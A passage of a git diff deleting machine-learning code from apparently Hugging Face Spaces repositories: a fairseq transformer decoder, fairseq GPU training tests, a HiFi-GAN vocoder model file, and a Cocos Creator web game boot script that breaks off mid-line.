- """ - - def __init__( - self, - cfg: Wav2Vec2Seq2SeqConfig, - dictionary, - embed_tokens, - no_encoder_attn=False, - ): - super().__init__(dictionary) - - self.dropout = cfg.decoder_dropout - self.share_input_output_embed = cfg.share_decoder_input_output_embed - - input_embed_dim = embed_tokens.embedding_dim - embed_dim = cfg.decoder_embed_dim - self.output_embed_dim = cfg.decoder_embed_dim - - self.layerdrop = cfg.decoder_layerdrop - - self.padding_idx = embed_tokens.padding_idx - self.max_target_positions = cfg.max_target_positions - - self.embed_tokens = embed_tokens - self.embed_scale = math.sqrt(embed_dim) # todo: try with input_embed_dim - - self.project_in_dim = ( - Linear(input_embed_dim, embed_dim, bias=False) - if embed_dim != input_embed_dim - else None - ) - - self.embed_positions = ( - PositionalEmbedding( - cfg.max_target_positions, - embed_dim, - self.padding_idx, - learned=cfg.decoder_learned_pos, - ) - if not cfg.no_token_positional_embeddings - else None - ) - - # TODO: update this when transformer gets converted to dataclass configs - transformer_cfg = copy.deepcopy(cfg) - with open_dict(transformer_cfg): - transformer_cfg.dropout = transformer_cfg.decoder_dropout - transformer_cfg.attention_dropout = ( - transformer_cfg.decoder_attention_dropout - ) - transformer_cfg.activation_dropout = ( - transformer_cfg.decoder_activation_dropout - ) - - self.layers = nn.ModuleList([]) - self.layers.extend( - [ - TransformerDecoderLayer(transformer_cfg, no_encoder_attn) - for _ in range(transformer_cfg.decoder_layers) - ] - ) - - if not self.share_input_output_embed: - self.embed_out = nn.Parameter( - torch.Tensor(len(dictionary), self.output_embed_dim) - ) - nn.init.normal_(self.embed_out, mean=0, std=self.output_embed_dim ** -0.5) - - if transformer_cfg.decoder_normalize_before: - self.layer_norm = LayerNorm(embed_dim) - else: - self.layer_norm = None - - def forward( - self, prev_output_tokens, encoder_out=None, incremental_state=None, **unused - ): - """ - Args: - prev_output_tokens (LongTensor): previous decoder outputs of shape - `(batch, tgt_len)`, for teacher forcing - encoder_out (Tensor, optional): output from the encoder, used for - encoder-side attention - incremental_state (dict): dictionary used for storing state during - :ref:`Incremental decoding` - - Returns: - tuple: - - the decoder's output of shape `(batch, tgt_len, vocab)` - - a dictionary with any model-specific outputs - """ - prev_output_tokens = prev_output_tokens.long() - x, extra = self.extract_features( - prev_output_tokens, encoder_out, incremental_state - ) - x = self.output_layer(x) - return x, extra - - def extract_features( - self, prev_output_tokens, encoder_out=None, incremental_state=None, **unused - ): - """ - Similar to *forward* but only return features. 
- - Returns: - tuple: - - the decoder's features of shape `(batch, tgt_len, embed_dim)` - - a dictionary with any model-specific outputs - """ - - # embed positions - positions = ( - self.embed_positions( - prev_output_tokens, incremental_state=incremental_state - ) - if self.embed_positions is not None - else None - ) - - if incremental_state is not None: - prev_output_tokens = prev_output_tokens[:, -1:] - if positions is not None: - positions = positions[:, -1:] - - # embed tokens and positions - x = self.embed_scale * self.embed_tokens(prev_output_tokens) - - if self.project_in_dim is not None: - x = self.project_in_dim(x) - - if positions is not None: - x += positions - x = F.dropout(x, p=self.dropout, training=self.training) - - # B x T x C -> T x B x C - x = x.transpose(0, 1) - attn = None - - inner_states = [x] - - # decoder layers - self_attn_padding_mask = None - if prev_output_tokens.eq(self.padding_idx).any(): - self_attn_padding_mask = prev_output_tokens.eq(self.padding_idx) - for layer in self.layers: - dropout_probability = np.random.random() - if not self.training or (dropout_probability > self.layerdrop): - x, attn, _ = layer( - x, - encoder_out["encoder_out"] if encoder_out is not None else None, - encoder_out["padding_mask"] if encoder_out is not None else None, - incremental_state, - self_attn_mask=self.buffered_future_mask(x) - if incremental_state is None - else None, - self_attn_padding_mask=self_attn_padding_mask - ) - inner_states.append(x) - - if self.layer_norm: - x = self.layer_norm(x) - - # T x B x C -> B x T x C - x = x.transpose(0, 1) - - return x, {"attn": attn, "inner_states": inner_states} - - def output_layer(self, features, **kwargs): - """Project features to the vocabulary size.""" - # project back to size of vocabulary - if self.share_input_output_embed: - return F.linear(features, self.embed_tokens.weight) - else: - return F.linear(features, self.embed_out) - - def max_positions(self): - """Maximum output length supported by the decoder.""" - if self.embed_positions is None: - return self.max_target_positions - return min(self.max_target_positions, self.embed_positions.max_positions) - - def buffered_future_mask(self, tensor): - dim = tensor.size(0) - if ( - not hasattr(self, "_future_mask") - or self._future_mask is None - or self._future_mask.device != tensor.device - or self._future_mask.size(0) < dim - ): - self._future_mask = torch.triu( - utils.fill_with_neg_inf(tensor.new(dim, dim)), 1 - ) - return self._future_mask[:dim, :dim] - - def upgrade_state_dict_named(self, state_dict, name): - return state_dict - - -def Embedding(num_embeddings, embedding_dim, padding_idx): - m = nn.Embedding(num_embeddings, embedding_dim, padding_idx=padding_idx) - nn.init.normal_(m.weight, mean=0, std=embedding_dim ** -0.5) - nn.init.constant_(m.weight[padding_idx], 0) - return m - - -def Linear(in_features, out_features, bias=True): - m = nn.Linear(in_features, out_features, bias) - nn.init.xavier_uniform_(m.weight) - if bias: - nn.init.constant_(m.bias, 0.0) - return m diff --git a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/tests/gpu/test_binaries_gpu.py b/spaces/HarryLee/eCommerceImageCaptioning/fairseq/tests/gpu/test_binaries_gpu.py deleted file mode 100644 index de8c2426134089035c6e0e5da223647bab6f3dba..0000000000000000000000000000000000000000 --- a/spaces/HarryLee/eCommerceImageCaptioning/fairseq/tests/gpu/test_binaries_gpu.py +++ /dev/null @@ -1,449 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. 
-# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import contextlib -import logging -import json -import os -import tempfile -import unittest -from io import StringIO - -import torch -from fairseq import options -from fairseq_cli import train -from tests.utils import ( - create_dummy_data, - generate_main, - preprocess_lm_data, - preprocess_translation_data, - train_translation_model, -) - - -@unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") -class TestTranslationGPU(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_fp16_multigpu(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fp16") as data_dir: - log = os.path.join(data_dir, "train.log") - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - ["--fp16", "--log-file", log], - world_size=min(torch.cuda.device_count(), 2), - ) - generate_main(data_dir) - assert os.path.exists(log) - - @staticmethod - def parse_logs(logfile): - logs = [] - for ln in open(logfile, "r").readlines(): - try: - logs.append(json.loads(ln)) - except json.JSONDecodeError: - continue - return logs - - def test_resume_training_fsdp(self): - self._test_resume_training(["--ddp-backend", "fully_sharded"]) - - def test_resume_training_fsdp_sharded_state(self): - self._test_resume_training(["--ddp-backend", "fully_sharded", "--use-sharded-state"]) - - def test_resume_training_noc10d(self): - self._test_resume_training([]) - - def _test_resume_training(self, extra_clargs, arch="fconv_iwslt_de_en"): - flags = [ - "--fp16", - "--log-format", - "json", - "--max-update", - "10", - "--save-interval-updates", - "2", - "--log-interval", - "1", - ] + extra_clargs - world_size = min(torch.cuda.device_count(), 2) - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fp16") as data_dir: - log = os.path.join(data_dir, "train.log") - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, arch, flags + ["--log-file", log], world_size=world_size, - ) - log2 = os.path.join(data_dir, "resume.log") - restore_file = os.path.join(data_dir, "checkpoint_1_2.pt") - train_translation_model( - data_dir, - arch, - flags + ["--log-file", log2, "--restore-file", restore_file], - world_size=world_size, - ) - - l1 = self.parse_logs(log) - l2 = self.parse_logs(log2) - assert int(l2[0]["num_updates"]) == 3, f"{l1}\n\n {l2}" - for k in [ - "train_loss", - "train_num_updates", - "train_ppl", - "train_gnorm", - ]: - from_scratch, resumed = l1[-1][k], l2[-1][k] - assert ( - from_scratch == resumed - ), f"difference at {k} {from_scratch} != {resumed}" - - def test_memory_efficient_fp16(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_memory_efficient_fp16") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, "fconv_iwslt_de_en", ["--memory-efficient-fp16"] - ) - generate_main(data_dir) - - def test_transformer_fp16(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_transformer") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - [ - 
"--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "64", - "--decoder-embed-dim", - "64", - "--fp16", - ], - run_validation=True, - ) - generate_main(data_dir) - - @unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") - def test_amp(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_amp") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model(data_dir, "fconv_iwslt_de_en", ["--amp"]) - generate_main(data_dir) - - @unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") - def test_transformer_amp(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_transformer") as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - train_translation_model( - data_dir, - "transformer_iwslt_de_en", - [ - "--encoder-layers", - "2", - "--decoder-layers", - "2", - "--encoder-embed-dim", - "64", - "--decoder-embed-dim", - "64", - "--amp", - ], - run_validation=True, - ) - generate_main(data_dir) - - @unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") - def test_levenshtein_transformer(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory( - "test_levenshtein_transformer" - ) as data_dir: - create_dummy_data(data_dir) - preprocess_translation_data(data_dir, ["--joined-dictionary"]) - train_translation_model( - data_dir, - "levenshtein_transformer", - [ - "--apply-bert-init", - "--early-exit", - "6,6,6", - "--criterion", - "nat_loss", - ], - task="translation_lev", - ) - gen_config = [ - "--task", - "translation_lev", - "--iter-decode-max-iter", - "9", - "--iter-decode-eos-penalty", - "0", - "--print-step", - ] - # non-ensemble generation - generate_main(data_dir, gen_config) - # ensemble generation - generate_main( - data_dir, - gen_config, - path=os.pathsep.join( - [ - os.path.join(data_dir, "checkpoint_last.pt"), - os.path.join(data_dir, "checkpoint_last.pt"), - ] - ), - ) - - def test_fsdp_checkpoint_generate(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fsdp_sharded") as data_dir: - log = os.path.join(data_dir, "train.log") - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - world_size = min(torch.cuda.device_count(), 2) - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - ["--log-file", log, "--ddp-backend", "fully_sharded"], - world_size=world_size, - ) - generate_main(data_dir) - assert os.path.exists(log) - - def test_fsdp_sharded_checkpoint_generate(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_fsdp_sharded") as data_dir: - log = os.path.join(data_dir, "train.log") - create_dummy_data(data_dir) - preprocess_translation_data(data_dir) - world_size = min(torch.cuda.device_count(), 2) - train_translation_model( - data_dir, - "fconv_iwslt_de_en", - ["--log-file", log, "--ddp-backend", "fully_sharded", "--use-sharded-state"], - world_size=world_size, - ) - generate_main(data_dir, ["--checkpoint-shard-count", str(world_size)]) - assert os.path.exists(log) - - -def _quantize_language_model(data_dir, arch, extra_flags=None, run_validation=False): - train_parser = options.get_training_parser() - train_args = options.parse_args_and_arch( - train_parser, - [ - "--task", - "language_modeling", - data_dir, - "--arch", - arch, - "--optimizer", - "adam", - "--lr", - "0.0001", - "--criterion", - "adaptive_loss", 
- "--adaptive-softmax-cutoff", - "5,10,15", - "--max-tokens", - "500", - "--tokens-per-sample", - "500", - "--save-dir", - data_dir, - "--max-epoch", - "1", - "--no-progress-bar", - "--distributed-world-size", - "1", - "--ddp-backend", - "no_c10d", - "--num-workers", - "0", - ] - + (extra_flags or []), - ) - train.main(train_args) - - # try scalar quantization - scalar_quant_train_parser = options.get_training_parser() - scalar_quant_train_args = options.parse_args_and_arch( - scalar_quant_train_parser, - [ - "--task", - "language_modeling", - data_dir, - "--arch", - arch, - "--optimizer", - "adam", - "--lr", - "0.0001", - "--criterion", - "adaptive_loss", - "--adaptive-softmax-cutoff", - "5,10,15", - "--max-tokens", - "500", - "--tokens-per-sample", - "500", - "--save-dir", - data_dir, - "--max-update", - "3", - "--no-progress-bar", - "--distributed-world-size", - "1", - "--ddp-backend", - "no_c10d", - "--num-workers", - "0", - "--quant-noise-scalar", - "0.5", - ] - + (extra_flags or []), - ) - train.main(scalar_quant_train_args) - - # try iterative PQ quantization - quantize_parser = options.get_training_parser() - quantize_args = options.parse_args_and_arch( - quantize_parser, - [ - "--task", - "language_modeling", - data_dir, - "--arch", - arch, - "--optimizer", - "adam", - "--lr", - "0.0001", - "--criterion", - "adaptive_loss", - "--adaptive-softmax-cutoff", - "5,10,15", - "--max-tokens", - "50", - "--tokens-per-sample", - "50", - "--max-update", - "6", - "--no-progress-bar", - "--distributed-world-size", - "1", - "--ddp-backend", - "no_c10d", - "--num-workers", - "0", - "--restore-file", - os.path.join(data_dir, "checkpoint_last.pt"), - "--reset-optimizer", - "--quantization-config-path", - os.path.join( - os.path.dirname(__file__), "transformer_quantization_config.yaml" - ), - ] - + (extra_flags or []), - ) - train.main(quantize_args) - - -@unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") -class TestQuantization(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_quantization(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_quantization") as data_dir: - create_dummy_data(data_dir) - preprocess_lm_data(data_dir) - # tests both scalar and iterative PQ quantization - _quantize_language_model(data_dir, "transformer_lm") - - -@unittest.skipIf(not torch.cuda.is_available(), "test requires a GPU") -class TestOptimizersGPU(unittest.TestCase): - def setUp(self): - logging.disable(logging.CRITICAL) - - def tearDown(self): - logging.disable(logging.NOTSET) - - def test_flat_grads(self): - with contextlib.redirect_stdout(StringIO()): - with tempfile.TemporaryDirectory("test_flat_grads") as data_dir: - # Use just a bit of data and tiny model to keep this test runtime reasonable - create_dummy_data(data_dir, num_examples=10, maxlen=5) - preprocess_translation_data(data_dir) - with self.assertRaises(RuntimeError): - # adafactor isn't compatible with flat grads, which - # are used by default with --fp16 - train_translation_model( - data_dir, - "lstm", - [ - "--required-batch-size-multiple", - "1", - "--encoder-layers", - "1", - "--encoder-hidden-size", - "32", - "--decoder-layers", - "1", - "--optimizer", - "adafactor", - "--fp16", - ], - ) - # but it should pass once we set --fp16-no-flatten-grads - train_translation_model( - data_dir, - "lstm", - [ - "--required-batch-size-multiple", - "1", - "--encoder-layers", - "1", - 
"--encoder-hidden-size", - "32", - "--decoder-layers", - "1", - "--optimizer", - "adafactor", - "--fp16", - "--fp16-no-flatten-grads", - ], - ) - - -if __name__ == "__main__": - unittest.main() diff --git a/spaces/Harveenchadha/Vakyansh-Odia-TTS/ttsv/src/hifi_gan/models.py b/spaces/Harveenchadha/Vakyansh-Odia-TTS/ttsv/src/hifi_gan/models.py deleted file mode 100644 index be51fa51407e6ce1daaee5e8d090f6acdbee0db9..0000000000000000000000000000000000000000 --- a/spaces/Harveenchadha/Vakyansh-Odia-TTS/ttsv/src/hifi_gan/models.py +++ /dev/null @@ -1,403 +0,0 @@ -import torch -import torch.nn.functional as F -import torch.nn as nn -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from utils import init_weights, get_padding - -LRELU_SLOPE = 0.1 - - -class ResBlock1(torch.nn.Module): - def __init__(self, h, channels, kernel_size=3, dilation=(1, 3, 5)): - super(ResBlock1, self).__init__() - self.h = h - self.convs1 = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[2], - padding=get_padding(kernel_size, dilation[2]), - ) - ), - ] - ) - self.convs1.apply(init_weights) - - self.convs2 = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=1, - padding=get_padding(kernel_size, 1), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=1, - padding=get_padding(kernel_size, 1), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=1, - padding=get_padding(kernel_size, 1), - ) - ), - ] - ) - self.convs2.apply(init_weights) - - def forward(self, x): - for c1, c2 in zip(self.convs1, self.convs2): - xt = F.leaky_relu(x, LRELU_SLOPE) - xt = c1(xt) - xt = F.leaky_relu(xt, LRELU_SLOPE) - xt = c2(xt) - x = xt + x - return x - - def remove_weight_norm(self): - for l in self.convs1: - remove_weight_norm(l) - for l in self.convs2: - remove_weight_norm(l) - - -class ResBlock2(torch.nn.Module): - def __init__(self, h, channels, kernel_size=3, dilation=(1, 3)): - super(ResBlock2, self).__init__() - self.h = h - self.convs = nn.ModuleList( - [ - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[0], - padding=get_padding(kernel_size, dilation[0]), - ) - ), - weight_norm( - Conv1d( - channels, - channels, - kernel_size, - 1, - dilation=dilation[1], - padding=get_padding(kernel_size, dilation[1]), - ) - ), - ] - ) - self.convs.apply(init_weights) - - def forward(self, x): - for c in self.convs: - xt = F.leaky_relu(x, LRELU_SLOPE) - xt = c(xt) - x = xt + x - return x - - def remove_weight_norm(self): - for l in self.convs: - remove_weight_norm(l) - - -class Generator(torch.nn.Module): - def __init__(self, h): - super(Generator, self).__init__() - self.h = h - self.num_kernels = len(h.resblock_kernel_sizes) - self.num_upsamples = len(h.upsample_rates) - self.conv_pre = weight_norm( - Conv1d(80, h.upsample_initial_channel, 7, 1, padding=3) - ) - resblock = ResBlock1 if h.resblock == "1" else ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(h.upsample_rates, h.upsample_kernel_sizes)): - self.ups.append( - 
weight_norm( - ConvTranspose1d( - h.upsample_initial_channel // (2 ** i), - h.upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = h.upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(h.resblock_kernel_sizes, h.resblock_dilation_sizes) - ): - self.resblocks.append(resblock(h, ch, k, d)) - - self.conv_post = weight_norm(Conv1d(ch, 1, 7, 1, padding=3)) - self.ups.apply(init_weights) - self.conv_post.apply(init_weights) - - def forward(self, x): - x = self.conv_pre(x) - for i in range(self.num_upsamples): - x = F.leaky_relu(x, LRELU_SLOPE) - x = self.ups[i](x) - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - print("Removing weight norm...") - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - remove_weight_norm(self.conv_pre) - remove_weight_norm(self.conv_post) - - -class DiscriminatorP(torch.nn.Module): - def __init__(self, period, kernel_size=5, stride=3, use_spectral_norm=False): - super(DiscriminatorP, self).__init__() - self.period = period - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f( - Conv2d( - 1, - 32, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(5, 1), 0), - ) - ), - norm_f( - Conv2d( - 32, - 128, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(5, 1), 0), - ) - ), - norm_f( - Conv2d( - 128, - 512, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(5, 1), 0), - ) - ), - norm_f( - Conv2d( - 512, - 1024, - (kernel_size, 1), - (stride, 1), - padding=(get_padding(5, 1), 0), - ) - ), - norm_f(Conv2d(1024, 1024, (kernel_size, 1), 1, padding=(2, 0))), - ] - ) - self.conv_post = norm_f(Conv2d(1024, 1, (3, 1), 1, padding=(1, 0))) - - def forward(self, x): - fmap = [] - - # 1d to 2d - b, c, t = x.shape - if t % self.period != 0: # pad first - n_pad = self.period - (t % self.period) - x = F.pad(x, (0, n_pad), "reflect") - t = t + n_pad - x = x.view(b, c, t // self.period, self.period) - - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self): - super(MultiPeriodDiscriminator, self).__init__() - self.discriminators = nn.ModuleList( - [ - DiscriminatorP(2), - DiscriminatorP(3), - DiscriminatorP(5), - DiscriminatorP(7), - DiscriminatorP(11), - ] - ) - - def forward(self, y, y_hat): - y_d_rs = [] - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - y_d_rs.append(y_d_r) - fmap_rs.append(fmap_r) - y_d_gs.append(y_d_g) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class DiscriminatorS(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(DiscriminatorS, self).__init__() - norm_f = weight_norm if use_spectral_norm == False else spectral_norm - self.convs = nn.ModuleList( - [ - norm_f(Conv1d(1, 128, 15, 1, padding=7)), - norm_f(Conv1d(128, 128, 41, 2, groups=4, padding=20)), - norm_f(Conv1d(128, 256, 41, 2, groups=16, 
padding=20)), - norm_f(Conv1d(256, 512, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(512, 1024, 41, 4, groups=16, padding=20)), - norm_f(Conv1d(1024, 1024, 41, 1, groups=16, padding=20)), - norm_f(Conv1d(1024, 1024, 5, 1, padding=2)), - ] - ) - self.conv_post = norm_f(Conv1d(1024, 1, 3, 1, padding=1)) - - def forward(self, x): - fmap = [] - for l in self.convs: - x = l(x) - x = F.leaky_relu(x, LRELU_SLOPE) - fmap.append(x) - x = self.conv_post(x) - fmap.append(x) - x = torch.flatten(x, 1, -1) - - return x, fmap - - -class MultiScaleDiscriminator(torch.nn.Module): - def __init__(self): - super(MultiScaleDiscriminator, self).__init__() - self.discriminators = nn.ModuleList( - [ - DiscriminatorS(use_spectral_norm=True), - DiscriminatorS(), - DiscriminatorS(), - ] - ) - self.meanpools = nn.ModuleList( - [AvgPool1d(4, 2, padding=2), AvgPool1d(4, 2, padding=2)] - ) - - def forward(self, y, y_hat): - y_d_rs = [] - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - if i != 0: - y = self.meanpools[i - 1](y) - y_hat = self.meanpools[i - 1](y_hat) - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - y_d_rs.append(y_d_r) - fmap_rs.append(fmap_r) - y_d_gs.append(y_d_g) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -def feature_loss(fmap_r, fmap_g): - loss = 0 - for dr, dg in zip(fmap_r, fmap_g): - for rl, gl in zip(dr, dg): - loss += torch.mean(torch.abs(rl - gl)) - - return loss * 2 - - -def discriminator_loss(disc_real_outputs, disc_generated_outputs): - loss = 0 - r_losses = [] - g_losses = [] - for dr, dg in zip(disc_real_outputs, disc_generated_outputs): - r_loss = torch.mean((1 - dr) ** 2) - g_loss = torch.mean(dg ** 2) - loss += r_loss + g_loss - r_losses.append(r_loss.item()) - g_losses.append(g_loss.item()) - - return loss, r_losses, g_losses - - -def generator_loss(disc_outputs): - loss = 0 - gen_losses = [] - for dg in disc_outputs: - l = torch.mean((1 - dg) ** 2) - gen_losses.append(l) - loss += l - - return loss, gen_losses diff --git a/spaces/Harveenchadha/Vakyansh-Tamil-TTS/ttsv/__init__.py b/spaces/Harveenchadha/Vakyansh-Tamil-TTS/ttsv/__init__.py deleted file mode 100644 index e69de29bb2d1d6434b8b29ae775ad8c2e48c5391..0000000000000000000000000000000000000000 diff --git a/spaces/HighCWu/Style2Paints-4.5-Gradio/ui/web-mobile/main.91744.js b/spaces/HighCWu/Style2Paints-4.5-Gradio/ui/web-mobile/main.91744.js deleted file mode 100644 index 4b4f97c5f1830bb378d8130aef0efafa97d56832..0000000000000000000000000000000000000000 --- a/spaces/HighCWu/Style2Paints-4.5-Gradio/ui/web-mobile/main.91744.js +++ /dev/null @@ -1,239 +0,0 @@ -(function () { - - function boot () { - - var settings = window._CCSettings; - window._CCSettings = undefined; - - if ( !settings.debug ) { - var uuids = settings.uuids; - - var rawAssets = settings.rawAssets; - var assetTypes = settings.assetTypes; - var realRawAssets = settings.rawAssets = {}; - for (var mount in rawAssets) { - var entries = rawAssets[mount]; - var realEntries = realRawAssets[mount] = {}; - for (var id in entries) { - var entry = entries[id]; - var type = entry[1]; - // retrieve minified raw asset - if (typeof type === 'number') { - entry[1] = assetTypes[type]; - } - // retrieve uuid - realEntries[uuids[id] || id] = entry; - } - } - - var scenes = settings.scenes; - for (var i = 0; i < scenes.length; ++i) { - var scene = scenes[i]; - if (typeof scene.uuid === 'number') { - scene.uuid = uuids[scene.uuid]; - } - } - - var packedAssets = settings.packedAssets; - for (var packId in 
packedAssets) { - var packedIds = packedAssets[packId]; - for (var j = 0; j < packedIds.length; ++j) { - if (typeof packedIds[j] === 'number') { - packedIds[j] = uuids[packedIds[j]]; - } - } - } - } - - // init engine - var canvas; - - if (cc.sys.isBrowser) { - canvas = document.getElementById('GameCanvas'); - } - - if (false) { - var ORIENTATIONS = { - 'portrait': 1, - 'landscape left': 2, - 'landscape right': 3 - }; - BK.Director.screenMode = ORIENTATIONS[settings.orientation]; - initAdapter(); - } - - function setLoadingDisplay () { - // Loading splash scene - var splash = document.getElementById('splash'); - var progressBar = splash.querySelector('.progress-bar span'); - cc.loader.onProgress = function (completedCount, totalCount, item) { - var percent = 100 * completedCount / totalCount; - if (progressBar) { - progressBar.style.width = percent.toFixed(2) + '%'; - } - }; - splash.style.display = 'block'; - progressBar.style.width = '0%'; - - cc.director.once(cc.Director.EVENT_AFTER_SCENE_LAUNCH, function () { - splash.style.display = 'none'; - }); - } - - var onStart = function () { - cc.loader.downloader._subpackages = settings.subpackages; - - if (false) { - BK.Script.loadlib(); - } - - cc.view.resizeWithBrowserSize(true); - - if (!false && !false) { - if (cc.sys.isBrowser) { - setLoadingDisplay(); - } - - if (cc.sys.isMobile) { - if (settings.orientation === 'landscape') { - cc.view.setOrientation(cc.macro.ORIENTATION_LANDSCAPE); - } - else if (settings.orientation === 'portrait') { - cc.view.setOrientation(cc.macro.ORIENTATION_PORTRAIT); - } - cc.view.enableAutoFullScreen([ - cc.sys.BROWSER_TYPE_BAIDU, - cc.sys.BROWSER_TYPE_WECHAT, - cc.sys.BROWSER_TYPE_MOBILE_QQ, - cc.sys.BROWSER_TYPE_MIUI, - ].indexOf(cc.sys.browserType) < 0); - } - - // Limit downloading max concurrent task to 2, - // more tasks simultaneously may cause performance draw back on some android system / browsers. - // You can adjust the number based on your own test result, you have to set it before any loading process to take effect. - if (cc.sys.isBrowser && cc.sys.os === cc.sys.OS_ANDROID) { - cc.macro.DOWNLOAD_MAX_CONCURRENT = 2; - } - } - - // init assets - cc.AssetLibrary.init({ - libraryPath: 'res/import', - rawAssetsBase: 'res/raw-', - rawAssets: settings.rawAssets, - packedAssets: settings.packedAssets, - md5AssetsMap: settings.md5AssetsMap - }); - - if (false) { - cc.Pipeline.Downloader.PackDownloader._doPreload("WECHAT_SUBDOMAIN", settings.WECHAT_SUBDOMAIN_DATA); - } - - var launchScene = settings.launchScene; - - // load scene - cc.director.loadScene(launchScene, null, - function () { - if (cc.sys.isBrowser) { - // show canvas - canvas.style.visibility = ''; - var div = document.getElementById('GameDiv'); - if (div) { - div.style.backgroundImage = ''; - } - } - cc.loader.onProgress = null; - console.log('Success to load scene: ' + launchScene); - } - ); - }; - - // jsList - var jsList = settings.jsList; - - if (!false) { - var bundledScript = settings.debug ? 'src/project.dev.js' : 'src/project.f12e5.js'; - if (jsList) { - jsList = jsList.map(function (x) { - return 'src/' + x; - }); - jsList.push(bundledScript); - } - else { - jsList = [bundledScript]; - } - } - - // anysdk scripts - if (cc.sys.isNative && cc.sys.isMobile) { - jsList = jsList.concat(['src/anysdk/jsb_anysdk.js', 'src/anysdk/jsb_anysdk_constants.js']); - } - - var option = { - //width: width, - //height: height, - id: 'GameCanvas', - scenes: settings.scenes, - debugMode: settings.debug ? 
